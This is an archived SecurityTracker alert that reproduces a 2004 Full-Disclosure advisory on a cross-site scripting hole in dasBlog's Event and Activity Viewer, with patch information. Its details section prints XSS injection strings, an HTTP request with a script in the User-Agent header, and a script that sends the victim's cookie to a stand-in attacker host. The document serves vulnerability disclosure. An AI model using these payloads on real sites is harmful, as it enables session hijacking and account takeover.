SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   dasBlog Vendors:   newtelligence
dasBlog Input Validation Hole in Event and Activity Viewer Lets Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1011134
SecurityTracker URL:  http://securitytracker.com/id/1011134
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 1 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   An input validation vulnerability was reported in dasBlog. A remote user can conduct cross-site scripting attacks.

Dominick Baier reported that the Event and Activity Viewer does not properly filter HTML code from the log files before displaying the content. A remote user can submit a specially crafted HTTP header to the target server with scripting code in the URL, Referer field, or User Agent field. Then, when a target user views the request information with the Event and Activity Viewer, arbitrary scripting code will be executed by the target user's browser. The code will originate from the site running the dasBlog software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The vendor was notified on August 15, 2004.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the dasBlog software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   A fix is available at:

http://www.dasblog.net/documentation/CategoryView.aspx?category=Download

Vendor URL:  www.dasblog.net/documentation/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] Cross-Site Scripting Vulnerability in Newtelligence DasBlog


ERNW Security Advisory

Cross-Site Scripting Vulnerability in Newtelligence DasBlog 

Author:
Dominick Baier <dbaier@ernw.de>

1. Summary:
A XSS (Cross-Site-Scripting) Vulnerability in DasBlog's Event and Activity
Viewer allows to inject and execute code on the client's machine. This
allows an attacker to transfer the ASP.NET authentication cookie to a server
of his choice. The attacker can use this cookie to log on to DasBlog and
modify blog entries and configuration settings.

2. Severity : Critical

3. Systems affected

DasBlog Versions:
	All

Browsers
	Tested with IE 6 and Firefox 0.93

4. Patch Availability :
http://www.gotdotnet.com/workspaces/releases/viewuploads.aspx?id=77a29128-47
46-4473-b676-e4f1517a1907
Vendor instructions
http://staff.newtelligence.net/clemensv/PermaLink.aspx?guid=69bce168-cb09-4f
09-8d53-f0b97f11b198

5. Details

The Activity and Events Viewer show details about requests that were made to
the blog site. As extra information they show the Referrers, Query Strings
and User Agents of these requests. It is possible to specially malform those
HTTP Headers to inject scripting code. This code gets embedded in the HTML
pages and executed on the client. With specially crafted JavaScript code a
attacker can transfer the ASP.NET Forms Authentication Cookie to a server of
the his choice. While injecting this cookie in a HTTP request to DasBlog he
can authenticate without having to know the username or the password and
enter the administrative area.

Examples of script injections

<script>alert('XSS')</script>
<img%20src="javascript:alert('XSS')">
<img%20src=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a
;alert(&quot;XSS&quot;)>

Leading e.g. to the following HTTP request

GET / HTTP/1.1
User-Agent: <script>alert('xss')</script>
Host: www.victim.com\r\n
Accept: */*


Example of transferring a cookie using JavaScript

<script>document.location='http://www.evil-site.com/cookieEater.aspx?cookie=
'+document.cookie</script>

6. Solution
Install the patch.

7. Time-Line 
The vulnerability was found on the 15th August 2004. The author was
contacted on the same day with a immediate response. The patch has been
provided on the 30.August 2004

8. Disclaimer
 
The informations in this advisory are provided "AS IS" without warranty 
of any kind. In no event shall the authors be liable for any damages 
whatsoever including direct, indirect, incidental, consequential, 
loss of business profits or special damages due to the misuse of any 
information provided in this advisory. 



 

---
Dominick Baier, Dipl. Ing. Informationstechnik (BA)
.NET Architecture / Security Consultant
www.leastprivilege.com

Tel. +49 151 16 22 75 56 / Fax. +49 6221 419 008
dbaier@ernw.de / www.ernw.de

PGP (www.ernw.de/keys/dbaier.zip)
7AE0 B3D2 7FFC 7763 E32A  07C2 8B0D F988 DC8D BFB1

X509v3 (www.ernw.de/keys/dbaier@ernw.de.zip)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC